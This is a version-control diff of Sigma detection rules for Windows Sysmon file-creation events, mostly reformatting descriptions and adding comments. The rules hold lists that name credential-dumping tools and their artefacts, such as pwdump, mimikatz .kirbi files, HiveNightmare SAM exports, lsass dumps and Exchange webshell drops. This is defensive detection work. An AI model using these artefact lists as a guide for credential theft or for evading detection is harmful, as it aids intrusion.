a/sigma/sysmon/file/file_event/file_event_win_anydesk_writing_susp_binaries.yml +++ b/sigma/sysmon/file/file_event/file_event_win_anydesk_writing_susp_binaries.yml @@ -1,15 +1,10 @@ title: Suspicious Binary Writes Via AnyDesk id: 2d367498-5112-4ae5-a06a-96e7bc33a211 status: test -description: 'Detects AnyDesk writing binary files to disk other than "gcapi.dll". - - According to RedCanary research it is highly abnormal for AnyDesk to write executable - files to disk besides gcapi.dll, - - which is a legitimate DLL that is part of the Google Chrome web browser used to - interact with the Google Cloud API. (See reference section for more details) - - ' +description: | + Detects AnyDesk writing binary files to disk other than "gcapi.dll". + According to RedCanary research it is highly abnormal for AnyDesk to write executable files to disk besides gcapi.dll, + which is a legitimate DLL that is part of the Google Chrome web browser used to interact with the Google Cloud API. (See reference section for more details) references: - https://redcanary.com/blog/misbehaving-rats/ author: Nasreddine Bencherchali (Nextron Systems) diff --git a/sigma/sysmon/file/file_event/file_event_win_aspnet_temp_files.yml b/sigma/sysmon/file/file_event/file_event_win_aspnet_temp_files.yml index 958d07603..a2f1583e8 100644 --- a/sigma/sysmon/file/file_event/file_event_win_aspnet_temp_files.yml +++ b/sigma/sysmon/file/file_event/file_event_win_aspnet_temp_files.yml @@ -1,18 +1,15 @@ title: Assembly DLL Creation Via AspNetCompiler -id: 4c7f49ee-2638-43bb-b85b-ce676c30b260 +id: 4c7f49ee-2638-43bb-b85b-ce676c30b260 # TMP File related: - - id: 9ccba514-7cb6-4c5c-b377-700758f2f120 - type: similar - - id: 9f50fe98-fe5c-4a2d-86c7-fad7f63ed622 - type: similar - - id: a01b8329-5953-4f73-ae2d-aa01e1f35f00 - type: similar + - id: 9ccba514-7cb6-4c5c-b377-700758f2f120 # SuspChild + type: similar + - id: 9f50fe98-fe5c-4a2d-86c7-fad7f63ed622 # Susp Paths + type: similar + - id: a01b8329-5953-4f73-ae2d-aa01e1f35f00 # Exec + type: similar status: experimental -description: 'Detects the creation of new DLL assembly files by "aspnet_compiler.exe", - which could be a sign of "aspnet_compiler" abuse to proxy execution through a - build provider. - - ' +description: | + Detects the creation of new DLL assembly files by "aspnet_compiler.exe", which could be a sign of "aspnet_compiler" abuse to proxy execution through a build provider. references: - Internal Research author: Nasreddine Bencherchali (Nextron Systems) diff --git a/sigma/sysmon/file/file_event/file_event_win_bloodhound_collection.yml b/sigma/sysmon/file/file_event/file_event_win_bloodhound_collection.yml index 644cc9c9b..06573a5db 100644 --- a/sigma/sysmon/file/file_event/file_event_win_bloodhound_collection.yml +++ b/sigma/sysmon/file/file_event/file_event_win_bloodhound_collection.yml @@ -1,8 +1,7 @@ title: BloodHound Collection Files id: 02773bed-83bf-469f-b7ff-e676e7d78bab status: experimental -description: Detects default file names outputted by the BloodHound collection tool - SharpHound +description: Detects default file names outputted by the BloodHound collection tool SharpHound references: - https://academy.hackthebox.com/course/preview/active-directory-bloodhound/bloodhound--data-collection author: C.J. May @@ -41,7 +40,6 @@ detection: TargetFilename|endswith: \pocket_containers.json condition: file_event and (selection and not 1 of filter_optional_*) falsepositives: - - Some false positives may arise in some environment and this may require some - tuning. Add additional filters or reduce level depending on the level of noise + - Some false positives may arise in some environment and this may require some tuning. Add additional filters or reduce level depending on the level of noise level: high ruletype: Sigma diff --git a/sigma/sysmon/file/file_event/file_event_win_crackmapexec_patterns.yml b/sigma/sysmon/file/file_event/file_event_win_crackmapexec_patterns.yml index 29c25bd77..1be047a13 100644 --- a/sigma/sysmon/file/file_event/file_event_win_crackmapexec_patterns.yml +++ b/sigma/sysmon/file/file_event/file_event_win_crackmapexec_patterns.yml @@ -1,8 +1,7 @@ title: CrackMapExec File Creation Patterns id: 9433ff9c-5d3f-4269-99f8-95fc826ea489 status: test -description: Detects suspicious file creation patterns found in logs when CrackMapExec - is used +description: Detects suspicious file creation patterns found in logs when CrackMapExec is used references: - https://mpgn.gitbook.io/crackmapexec/smb-protocol/obtaining-credentials/dump-lsass author: Florian Roth (Nextron Systems) @@ -22,7 +21,7 @@ detection: selection_lsass_dump1: TargetFilename|startswith: C:\Windows\Temp\ Image: C:\WINDOWS\system32\rundll32.exe - User|contains: + User|contains: # covers many language settings - AUTHORI - AUTORI TargetFilename|endswith: @@ -51,9 +50,10 @@ detection: - .drv - .cur - .tmp + # list is incomplete selection_procdump: TargetFilename: C:\Windows\Temp\procdump.exe - User|contains: + User|contains: # covers many language settings - AUTHORI - AUTORI condition: file_event and (1 of selection*) diff --git a/sigma/sysmon/file/file_event/file_event_win_create_evtx_non_common_locations.yml b/sigma/sysmon/file/file_event/file_event_win_create_evtx_non_common_locations.yml index ac7036ac6..c58af9f6b 100644 --- a/sigma/sysmon/file/file_event/file_event_win_create_evtx_non_common_locations.yml +++ b/sigma/sysmon/file/file_event/file_event_win_create_evtx_non_common_locations.yml @@ -1,9 +1,7 @@ title: EVTX Created In Uncommon Location id: 65236ec7-ace0-4f0c-82fd-737b04fd4dcb status: experimental -description: Detects the creation of new files with the ".evtx" extension in non-common - locations. Which could indicate tampering with default evtx locations in order - to evade security controls +description: Detects the creation of new files with the ".evtx" extension in non-common locations. Which could indicate tampering with default evtx locations in order to evade security controls references: - https://learn.microsoft.com/en-us/windows/win32/eventlog/eventlog-key author: D3F7A5105 @@ -16,8 +14,7 @@ tags: logsource: category: file_event product: windows - definition: 'Requirements: The ".evtx" extension should be monitored via a Sysmon - configuration. Example: .evtx' + definition: 'Requirements: The ".evtx" extension should be monitored via a Sysmon configuration. Example: .evtx' detection: file_event: EventID: 11 diff --git a/sigma/sysmon/file/file_event/file_event_win_create_non_existent_dlls.yml b/sigma/sysmon/file/file_event/file_event_win_create_non_existent_dlls.yml index 0a8d613f8..e15f11a6c 100644 --- a/sigma/sysmon/file/file_event/file_event_win_create_non_existent_dlls.yml +++ b/sigma/sysmon/file/file_event/file_event_win_create_non_existent_dlls.yml @@ -1,15 +1,12 @@ title: Creation Of Non-Existent System DLL id: df6ecb8b-7822-4f4b-b412-08f524b4576c related: - - id: 6b98b92b-4f00-4f62-b4fe-4d1920215771 - type: similar + - id: 6b98b92b-4f00-4f62-b4fe-4d1920215771 # ImageLoad rule + type: similar status: test -description: 'Detects the creation of system DLLs that are usually not present on - the system (or at least not in system directories). - +description: | + Detects the creation of system DLLs that are usually not present on the system (or at least not in system directories). Usually this technique is used to achieve DLL hijacking. - - ' references: - https://decoded.avast.io/martinchlumecky/png-steganography/ - https://posts.specterops.io/lateral-movement-scm-and-dll-hijacking-primer-d2f61e8ab992 diff --git a/sigma/sysmon/file/file_event/file_event_win_creation_new_shim_database.yml b/sigma/sysmon/file/file_event/file_event_win_creation_new_shim_database.yml index 3e19f406d..b27320a49 100644 --- a/sigma/sysmon/file/file_event/file_event_win_creation_new_shim_database.yml +++ b/sigma/sysmon/file/file_event/file_event_win_creation_new_shim_database.yml @@ -1,14 +1,9 @@ title: New Custom Shim Database Created id: ee63c85c-6d51-4d12-ad09-04e25877a947 status: test -description: 'Adversaries may establish persistence and/or elevate privileges by executing - malicious content triggered by application shims. - - The Microsoft Windows Application Compatibility Infrastructure/Framework (Application - Shim) was created to allow for backward compatibility of software as the operating - system codebase changes over time. - - ' +description: | + Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by application shims. + The Microsoft Windows Application Compatibility Infrastructure/Framework (Application Shim) was created to allow for backward compatibility of software as the operating system codebase changes over time. references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1546.011/T1546.011.md#atomic-test-2---new-shim-database-files-created-in-the-default-shim-database-directory - https://www.mandiant.com/resources/blog/fin7-shim-databases-persistence diff --git a/sigma/sysmon/file/file_event/file_event_win_creation_scr_binary_file.yml b/sigma/sysmon/file/file_event/file_event_win_creation_scr_binary_file.yml index 0a4d8d025..25df3062b 100644 --- a/sigma/sysmon/file/file_event/file_event_win_creation_scr_binary_file.yml +++ b/sigma/sysmon/file/file_event/file_event_win_creation_scr_binary_file.yml @@ -1,13 +1,9 @@ title: Suspicious Screensaver Binary File Creation id: 97aa2e88-555c-450d-85a6-229bcd87efb8 status: test -description: 'Adversaries may establish persistence by executing malicious content - triggered by user inactivity. - - Screensavers are programs that execute after a configurable time of user inactivity - and consist of Portable Executable (PE) files with a .scr file extension - - ' +description: | + Adversaries may establish persistence by executing malicious content triggered by user inactivity. + Screensavers are programs that execute after a configurable time of user inactivity and consist of Portable Executable (PE) files with a .scr file extension references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1546.002/T1546.002.md author: frack113 @@ -29,8 +25,9 @@ detection: filter_generic: Image|endswith: - \Kindle.exe - - \Bin\ccSvcHst.exe + - \Bin\ccSvcHst.exe # Symantec Endpoint Protection filter_tiworker: + # ParentCommandLine: C:\WINDOWS\system32\svchost.exe -k DcomLaunch -p Image|endswith: \TiWorker.exe TargetFilename|endswith: \uwfservicingscr.scr condition: file_event and (selection and not 1 of filter_*) diff --git a/sigma/sysmon/file/file_event/file_event_win_creation_system_file.yml b/sigma/sysmon/file/file_event/file_event_win_creation_system_file.yml index 490bcdcdc..565c6193b 100644 --- a/sigma/sysmon/file/file_event/file_event_win_creation_system_file.yml +++ b/sigma/sysmon/file/file_event/file_event_win_creation_system_file.yml @@ -1,8 +1,7 @@ title: Files With System Process Name In Unsuspected Locations id: d5866ddf-ce8f-4aea-b28e-d96485a20d3d status: test -description: Detects the creation of an executable with a system process name in folders - other than the system ones (System32, SysWOW64...etc). +description: Detects the creation of an executable with a system process name in folders other than the system ones (System32, SysWOW64...etc). author: Sander Wiebing, Tim Shelton, Nasreddine Bencherchali (Nextron Systems) date: 2020/05/26 modified: 2023/11/10 @@ -117,7 +116,9 @@ detection: filter_main_explorer: TargetFilename|endswith: :\Windows\explorer.exe filter_main_msiexec: + # This filter handles system processes who are updated/installed using misexec. Image|endswith: :\WINDOWS\system32\msiexec.exe + # Add more processes if you find them or simply filter msiexec on its own. If the list grows big TargetFilename|endswith: - :\Program Files\PowerShell\7\pwsh.exe - :\Program Files\PowerShell\7-preview\pwsh.exe @@ -132,7 +133,6 @@ detection: condition: file_event and (selection and not 1 of filter_main_*) falsepositives: - System processes copied outside their default folders for testing purposes - - Third party software naming their software with the same names as the processes - mentioned here + - Third party software naming their software with the same names as the processes mentioned here level: high ruletype: Sigma diff --git a/sigma/sysmon/file/file_event/file_event_win_creation_unquoted_service_path.yml b/sigma/sysmon/file/file_event/file_event_win_creation_unquoted_service_path.yml index 4939b9605..aaaf3f9b2 100644 --- a/sigma/sysmon/file/file_event/file_event_win_creation_unquoted_service_path.yml +++ b/sigma/sysmon/file/file_event/file_event_win_creation_unquoted_service_path.yml @@ -1,14 +1,9 @@ title: Creation Exe for Service with Unquoted Path id: 8c3c76ca-8f8b-4b1d-aaf3-81aebcd367c9 status: test -description: 'Adversaries may execute their own malicious payloads by hijacking vulnerable - file path references. - - Adversaries can take advantage of paths that lack surrounding quotations by placing - an executable in a higher level directory within the path, so that Windows will - choose the adversary''s executable to launch. - - ' +description: | + Adversaries may execute their own malicious payloads by hijacking vulnerable file path references. + Adversaries can take advantage of paths that lack surrounding quotations by placing an executable in a higher level directory within the path, so that Windows will choose the adversary's executable to launch. references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1574.009/T1574.009.md author: frack113 @@ -25,6 +20,7 @@ detection: EventID: 11 Channel: Microsoft-Windows-Sysmon/Operational selection: + # Feel free to add more TargetFilename: C:\program.exe condition: file_event and selection falsepositives: diff --git a/sigma/sysmon/file/file_event/file_event_win_cred_dump_tools_dropped_files.yml b/sigma/sysmon/file/file_event/file_event_win_cred_dump_tools_dropped_files.yml index ca4c62939..41433d364 100644 --- a/sigma/sysmon/file/file_event/file_event_win_cred_dump_tools_dropped_files.yml +++ b/sigma/sysmon/file/file_event/file_event_win_cred_dump_tools_dropped_files.yml @@ -1,8 +1,7 @@ title: Cred Dump Tools Dropped Files id: 8fbf3271-1ef6-4e94-8210-03c2317947f6 status: test -description: Files with well-known filenames (parts of credential dump software or - files produced by them) creation +description: Files with well-known filenames (parts of credential dump software or files produced by them) creation references: - https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment author: Teymur Kheirkhabarov, oscd.community @@ -24,33 +23,33 @@ detection: EventID: 11 Channel: Microsoft-Windows-Sysmon/Operational selection: - - TargetFilename|contains: - - \fgdump-log - - \kirbi - - \pwdump - - \pwhashes - - \wce_ccache - - \wce_krbtkts - - TargetFilename|endswith: - - \cachedump.exe - - \cachedump64.exe - - \DumpExt.dll - - \DumpSvc.exe - - \Dumpy.exe - - \fgexec.exe - - \lsremora.dll - - \lsremora64.dll - - \NTDS.out - - \procdump64.exe - - \pstgdump.exe - - \pwdump.exe - - \SAM.out - - \SECURITY.out - - \servpw.exe - - \servpw64.exe - - \SYSTEM.out - - \test.pwd - - \wceaux.dll + - TargetFilename|contains: + - \fgdump-log + - \kirbi + - \pwdump + - \pwhashes + - \wce_ccache + - \wce_krbtkts + - TargetFilename|endswith: + - \cachedump.exe + - \cachedump64.exe + - \DumpExt.dll + - \DumpSvc.exe + - \Dumpy.exe + - \fgexec.exe + - \lsremora.dll + - \lsremora64.dll + - \NTDS.out + - \procdump64.exe + - \pstgdump.exe + - \pwdump.exe + - \SAM.out + - \SECURITY.out + - \servpw.exe + - \servpw64.exe + - \SYSTEM.out + - \test.pwd + - \wceaux.dll condition: file_event and selection falsepositives: - Legitimate Administrator using tool for password recovery diff --git a/sigma/sysmon/file/file_event/file_event_win_cscript_wscript_dropper.yml b/sigma/sysmon/file/file_event/file_event_win_cscript_wscript_dropper.yml index b9dce5827..909b5748f 100644 --- a/sigma/sysmon/file/file_event/file_event_win_cscript_wscript_dropper.yml +++ b/sigma/sysmon/file/file_event/file_event_win_cscript_wscript_dropper.yml @@ -1,11 +1,10 @@ title: WScript or CScript Dropper - File id: 002bdb95-0cf1-46a6-9e08-d38c128a6127 related: - - id: cea72823-df4d-4567-950c-0b579eaf0846 - type: derived + - id: cea72823-df4d-4567-950c-0b579eaf0846 + type: derived status: test -description: Detects a file ending in jse, vbe, js, vba, vbs written by cscript.exe - or wscript.exe +description: Detects a file ending in jse, vbe, js, vba, vbs written by cscript.exe or wscript.exe references: - WScript or CScript Dropper (cea72823-df4d-4567-950c-0b579eaf0846) author: Tim Shelton diff --git a/sigma/sysmon/file/file_event/file_event_win_csexec_service.yml b/sigma/sysmon/file/file_event/file_event_win_csexec_service.yml index c94a41e64..8e8a0994b 100644 --- a/sigma/sysmon/file/file_event/file_event_win_csexec_service.yml +++ b/sigma/sysmon/file/file_event/file_event_win_csexec_service.yml @@ -1,8 +1,7 @@ title: CSExec Service File Creation id: f0e2b768-5220-47dd-b891-d57b96fc0ec1 status: test -description: Detects default CSExec service filename which indicates CSExec service - installation and execution +description: Detects default CSExec service filename which indicates CSExec service installation and execution references: - https://github.com/malcomvetter/CSExec author: Nasreddine Bencherchali (Nextron Systems) diff --git a/sigma/sysmon/file/file_event/file_event_win_csharp_compile_artefact.yml b/sigma/sysmon/file/file_event/file_event_win_csharp_compile_artefact.yml index 74792ef8e..f261d2c5e 100644 --- a/sigma/sysmon/file/file_event/file_event_win_csharp_compile_artefact.yml +++ b/sigma/sysmon/file/file_event/file_event_win_csharp_compile_artefact.yml @@ -1,15 +1,10 @@ title: Dynamic CSharp Compile Artefact id: e4a74e34-ecde-4aab-b2fb-9112dd01aed0 status: test -description: 'When C# is compiled dynamically, a .cmdline file will be created as - a part of the process. - - Certain processes are not typically observed compiling C# code, but can do so - without touching disk. - +description: | + When C# is compiled dynamically, a .cmdline file will be created as a part of the process. + Certain processes are not typically observed compiling C# code, but can do so without touching disk. This can be used to unpack a payload for execution - - ' references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1027.004/T1027.004.md#atomic-test-2---dynamic-c-compile author: frack113 diff --git a/sigma/sysmon/file/file_event/file_event_win_dcom_iertutil_dll_hijack.yml b/sigma/sysmon/file/file_event/file_event_win_dcom_iertutil_dll_hijack.yml index 386481ceb..0a474f9e3 100644 --- a/sigma/sysmon/file/file_event/file_event_win_dcom_iertutil_dll_hijack.yml +++ b/sigma/sysmon/file/file_event/file_event_win_dcom_iertutil_dll_hijack.yml @@ -1,13 +1,12 @@ title: Potential DCOM InternetExplorer.Application DLL Hijack id: 2f7979ae-f82b-45af-ac1d-2b10e93b0baa related: - - id: e554f142-5cf3-4e55-ace9-a1b59e0def65 - type: obsoletes - - id: f354eba5-623b-450f-b073-0b5b2773b6aa - type: similar + - id: e554f142-5cf3-4e55-ace9-a1b59e0def65 + type: obsoletes + - id: f354eba5-623b-450f-b073-0b5b2773b6aa + type: similar status: test -description: Detects potential DLL hijack of "iertutil.dll" found in the DCOM InternetExplorer.Application - Class over the network +description: Detects potential DLL hijack of "iertutil.dll" found in the DCOM InternetExplorer.Application Class over the network references: - https://threathunterplaybook.com/hunts/windows/201009-RemoteDCOMIErtUtilDLLHijack/notebook.html author: Roberto Rodriguez @Cyb3rWard0g, Open Threat Research (OTR), wagga diff --git a/sigma/sysmon/file/file_event/file_event_win_dll_sideloading_space_path.yml b/sigma/sysmon/file/file_event/file_event_win_dll_sideloading_space_path.yml index 4c3a90044..525e8afb2 100644 --- a/sigma/sysmon/file/file_event/file_event_win_dll_sideloading_space_path.yml +++ b/sigma/sysmon/file/file_event/file_event_win_dll_sideloading_space_path.yml @@ -1,13 +1,9 @@ title: DLL Search Order Hijackig Via Additional Space in Path id: b6f91281-20aa-446a-b986-38a92813a18f status: test -description: 'Detects when an attacker create a similar folder structure to windows - system folders such as (Windows, Program Files...) - - but with a space in order to trick DLL load search order and perform a "DLL Search - Order Hijacking" attack - - ' +description: | + Detects when an attacker create a similar folder structure to windows system folders such as (Windows, Program Files...) + but with a space in order to trick DLL load search order and perform a "DLL Search Order Hijacking" attack references: - https://twitter.com/cyb3rops/status/1552932770464292864 - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows diff --git a/sigma/sysmon/file/file_event/file_event_win_dump_file_susp_creation.yml b/sigma/sysmon/file/file_event/file_event_win_dump_file_susp_creation.yml index 977db046d..2406a1802 100644 --- a/sigma/sysmon/file/file_event/file_event_win_dump_file_susp_creation.yml +++ b/sigma/sysmon/file/file_event/file_event_win_dump_file_susp_creation.yml @@ -1,13 +1,10 @@ title: Potentially Suspicious DMP/HDMP File Creation id: aba15bdd-657f-422a-bab3-ac2d2a0d6f1c related: - - id: 3a525307-d100-48ae-b3b9-0964699d7f97 - type: similar + - id: 3a525307-d100-48ae-b3b9-0964699d7f97 + type: similar status: experimental -description: Detects the creation of a file with the ".dmp"/".hdmp" extension by a - shell or scripting application such as "cmd", "powershell", etc. Often created - by software during a crash. Memory dumps can sometimes contain sensitive information - such as credentials. It's best to determine the source of the crash. +description: Detects the creation of a file with the ".dmp"/".hdmp" extension by a shell or scripting application such as "cmd", "powershell", etc. Often created by software during a crash. Memory dumps can sometimes contain sensitive information such as credentials. It's best to determine the source of the crash. references: - https://learn.microsoft.com/en-us/windows/win32/wer/collecting-user-mode-dumps author: Nasreddine Bencherchali (Nextron Systems) @@ -36,7 +33,6 @@ detection: - .hdmp condition: file_event and selection falsepositives: - - Some administrative PowerShell or VB scripts might have the ability to collect - dumps and move them to other folders which might trigger a false positive. + - Some administrative PowerShell or VB scripts might have the ability to collect dumps and move them to other folders which might trigger a false positive. level: medium ruletype: Sigma diff --git a/sigma/sysmon/file/file_event/file_event_win_errorhandler_persistence.yml b/sigma/sysmon/file/file_event/file_event_win_errorhandler_persistence.yml index 739b3184b..1a2f35183 100644 --- a/sigma/sysmon/file/file_event/file_event_win_errorhandler_persistence.yml +++ b/sigma/sysmon/file/file_event/file_event_win_errorhandler_persistence.yml @@ -1,13 +1,9 @@ title: Potential Persistence Attempt Via ErrorHandler.Cmd id: 15904280-565c-4b73-9303-3291f964e7f9 status: test -description: 'Detects creation of a file named "ErrorHandler.cmd" in the "C:\WINDOWS\Setup\Scripts\" - directory which could be used as a method of persistence - - The content of C:\WINDOWS\Setup\Scripts\ErrorHandler.cmd is read whenever some - tools under C:\WINDOWS\System32\oobe\ (e.g. Setup.exe) fail to run for any reason. - - ' +description: | + Detects creation of a file named "ErrorHandler.cmd" in the "C:\WINDOWS\Setup\Scripts\" directory which could be used as a method of persistence + The content of C:\WINDOWS\Setup\Scripts\ErrorHandler.cmd is read whenever some tools under C:\WINDOWS\System32\oobe\ (e.g. Setup.exe) fail to run for any reason. references: - https://www.hexacorn.com/blog/2022/01/16/beyond-good-ol-run-key-part-135/ - https://github.com/last-byte/PersistenceSniper diff --git a/sigma/sysmon/file/file_event/file_event_win_exchange_webshell_drop.yml b/sigma/sysmon/file/file_event/file_event_win_exchange_webshell_drop.yml index 73562eb92..918085d25 100644 --- a/sigma/sysmon/file/file_event/file_event_win_exchange_webshell_drop.yml +++ b/sigma/sysmon/file/file_event/file_event_win_exchange_webshell_drop.yml @@ -1,11 +1,10 @@ title: Suspicious ASPX File Drop by Exchange id: bd1212e5-78da-431e-95fa-c58e3237a8e6 related: - - id: 6b269392-9eba-40b5-acb6-55c882b20ba6 - type: similar + - id: 6b269392-9eba-40b5-acb6-55c882b20ba6 + type: similar status: test -description: Detects suspicious file type dropped by an Exchange component in IIS - into a suspicious folder +description: Detects suspicious file type dropped by an Exchange component in IIS into a suspicious folder references: - https://www.microsoft.com/security/blog/2022/09/30/analyzing-attacks-using-the-exchange-vulnerabilities-cve-2022-41040-and-cve-2022-41082/ - https://www.gteltsc.vn/blog/canh-bao-chien-dich-tan-cong-su-dung-lo-hong-zero-day-tren-microsoft-exchange-server-12714.html @@ -25,10 +24,10 @@ detection: Channel: Microsoft-Windows-Sysmon/Operational selection: Image|endswith: \w3wp.exe - CommandLine|contains: MSExchange + CommandLine|contains: MSExchange TargetFilename|contains: - - FrontEnd\HttpProxy\ - - \inetpub\wwwroot\aspnet_client\ + - FrontEnd\HttpProxy\ # from GTSC and MSTI reports + - \inetpub\wwwroot\aspnet_client\ # from GTSC report selection_types: TargetFilename|endswith: - .aspx diff --git a/sigma/sysmon/file/file_event/file_event_win_exchange_webshell_drop_suspicious.yml b/sigma/sysmon/file/file_event/file_event_win_exchange_webshell_drop_suspicious.yml index 92e2d88b0..129cc4e80 100644 --- a/sigma/sysmon/file/file_event/file_event_win_exchange_webshell_drop_suspicious.yml +++ b/sigma/sysmon/file/file_event/file_event_win_exchange_webshell_drop_suspicious.yml @@ -1,8 +1,8 @@ title: Suspicious File Drop by Exchange id: 6b269392-9eba-40b5-acb6-55c882b20ba6 related: - - id: bd1212e5-78da-431e-95fa-c58e3237a8e6 - type: similar + - id: bd1212e5-78da-431e-95fa-c58e3237a8e6 + type: similar status: test description: Detects suspicious file type dropped by an Exchange component in IIS references: @@ -26,7 +26,7 @@ detection: Channel: Microsoft-Windows-Sysmon/Operational selection: Image|endswith: \w3wp.exe - CommandLine|contains: MSExchange + CommandLine|contains: MSExchange selection_types: TargetFilename|endswith: - .aspx diff --git a/sigma/sysmon/file/file_event/file_event_win_gotoopener_artefact.yml b/sigma/sysmon/file/file_event/file_event_win_gotoopener_artefact.yml index 600b19b85..d18382b2a 100644 --- a/sigma/sysmon/file/file_event/file_event_win_gotoopener_artefact.yml +++ b/sigma/sysmon/file/file_event/file_event_win_gotoopener_artefact.yml @@ -1,18 +1,10 @@ title: GoToAssist Temporary Installation Artefact id: 5d756aee-ad3e-4306-ad95-cb1abec48de2 status: test -description: 'An adversary may use legitimate desktop support and remote access software, - such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive - command and control channel to target systems within networks. - - These services are commonly used as legitimate technical support software, and - may be allowed by application control within a target environment. - - Remote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared - with other legitimate software commonly used by adversaries. (Citation: Symantec - Living off the Land) - - ' +description: | + An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks. + These services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment. + Remote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land) references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1219/T1219.md#atomic-test-4---gotoassist-files-detected-test-on-windows author: frack113 @@ -29,8 +21,7 @@ detection: EventID: 11 Channel: Microsoft-Windows-Sysmon/Operational selection: - TargetFilename|contains: \AppData\Local\Temp\LogMeInInc\GoToAssist Remote - Support Expert\ + TargetFilename|contains: \AppData\Local\Temp\LogMeInInc\GoToAssist Remote Support Expert\ condition: file_event and selection falsepositives: - Legitimate use diff --git a/sigma/sysmon/file/file_event/file_event_win_hktl_dumpert.yml b/sigma/sysmon/file/file_event/file_event_win_hktl_dumpert.yml index 373d12571..e24be70ca 100644 --- a/sigma/sysmon/file/file_event/file_event_win_hktl_dumpert.yml +++ b/sigma/sysmon/file/file_event/file_event_win_hktl_dumpert.yml @@ -1,11 +1,10 @@ title: HackTool - Dumpert Process Dumper Default File id: 93d94efc-d7ad-4161-ad7d-1638c4f908d8 related: - - id: 2704ab9e-afe2-4854-a3b1-0c0706d03578 - type: derived + - id: 2704ab9e-afe2-4854-a3b1-0c0706d03578 + type: derived status: test -description: Detects the creation of the default dump file used by Outflank Dumpert - tool. A process dumper, which dumps the lsass process memory +description: Detects the creation of the default dump file used by Outflank Dumpert tool. A process dumper, which dumps the lsass process memory references: - https://github.com/outflanknl/Dumpert - https://unit42.paloaltonetworks.com/actors-still-exploiting-sharepoint-vulnerability/ diff --git a/sigma/sysmon/file/file_event/file_event_win_hktl_hivenightmare_file_exports.yml b/sigma/sysmon/file/file_event/file_event_win_hktl_hivenightmare_file_exports.yml index 82d39ad07..71e2629fa 100644 --- a/sigma/sysmon/file/file_event/file_event_win_hktl_hivenightmare_file_exports.yml +++ b/sigma/sysmon/file/file_event/file_event_win_hktl_hivenightmare_file_exports.yml @@ -23,14 +23,14 @@ detection: EventID: 11 Channel: Microsoft-Windows-Sysmon/Operational selection: - - TargetFilename|contains: - - \hive_sam_ - - \SAM-2021- - - \SAM-2022- - - \SAM-2023- - - \SAM-haxx - - \Sam.save - - TargetFilename: C:\windows\temp\sam + - TargetFilename|contains: + - \hive_sam_ # Go version + - \SAM-2021- # C++ version + - \SAM-2022- # C++ version + - \SAM-2023- # C++ version + - \SAM-haxx # Early C++ versions + - \Sam.save # PowerShell version + - TargetFilename: C:\windows\temp\sam # C# version of HiveNightmare condition: file_event and selection falsepositives: - Files that accidentally contain these strings diff --git a/sigma/sysmon/file/file_event/file_event_win_hktl_mimikatz_files.yml b/sigma/sysmon/file/file_event/file_event_win_hktl_mimikatz_files.yml index 473bd2254..9da7f4af2 100644 --- a/sigma/sysmon/file/file_event/file_event_win_hktl_mimikatz_files.yml +++ b/sigma/sysmon/file/file_event/file_event_win_hktl_mimikatz_files.yml @@ -1,11 +1,10 @@ title: Mimikatz Kirbi File Creation id: 9e099d99-44c2-42b6-a6d8-54c3545cab29 related: - - id: 034affe8-6170-11ec-844f-0f78aa0c4d66 - type: obsoletes + - id: 034affe8-6170-11ec-844f-0f78aa0c4d66 + type: obsoletes status: test -description: Detects the creation of files created by mimikatz such as ".kirbi", "mimilsa.log", - etc. +description: Detects the creation of files created by mimikatz such as ".kirbi", "mimilsa.log", etc. references: - https://cobalt.io/blog/kerberoast-attack-techniques - https://pentestlab.blog/2019/10/21/persistence-security-support-provider/ @@ -25,8 +24,8 @@ detection: Channel: Microsoft-Windows-Sysmon/Operational selection: TargetFilename|endswith: - - .kirbi - - mimilsa.log + - .kirbi # Kerberos tickets + - mimilsa.log # MemSSP default file condition: file_event and selection falsepositives: - Unlikely diff --git a/sigma/sysmon/file/file_event/file_event_win_hktl_nppspy.yml b/sigma/sysmon/file/file_event/file_event_win_hktl_nppspy.yml index c4f5ea7bc..2633b2fa3 100644 --- a/sigma/sysmon/file/file_event/file_event_win_hktl_nppspy.yml +++ b/sigma/sysmon/file/file_event/file_event_win_hktl_nppspy.yml @@ -1,8 +1,7 @@ title: NPPSpy Hacktool Usage id: cad1fe90-2406-44dc-bd03-59d0b58fe722 status: test -description: Detects the use of NPPSpy hacktool that stores cleartext passwords of - users that logged in to a local file +description: Detects the use of NPPSpy hacktool that stores cleartext passwords of users that logged in to a local file references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1003/T1003.md#atomic-test-2---credential-dumping-with-nppspy - https://twitter.com/0gtweet/status/1465282548494487554 diff --git a/sigma/sysmon/file/file_event/file_event_win_hktl_powerup_dllhijacking.yml b/sigma/sysmon/file/file_event/file_event_win_hktl_powerup_dllhijacking.yml index 0ac5bd50d..17756c382 100644 --- a/sigma/sysmon/file/file_event/file_event_win_hktl_powerup_dllhijacking.yml +++ b/sigma/sysmon/file/file_event/file_event_win_hktl_powerup_dllhijacking.yml @@ -1,16 +1,10 @@ title: Powerup Write Hijack DLL id: 602a1f13-c640-4d73-b053-be9a2fa58b96 status: test -description: 'Powerup tool''s Write Hijack DLL exploits DLL hijacking for privilege - escalation. - - In it''s default mode, it builds a self deleting .bat file which executes malicious - command. - - The detection rule relies on creation of the malicious bat file (debug.bat by - default). - - ' +description: | + Powerup tool's Write Hijack DLL exploits DLL hijacking for privilege escalation. + In it's default mode, it builds a self deleting .bat file which executes malicious command. + The detection rule relies on creation of the malicious bat file (debug.bat by default). references: - 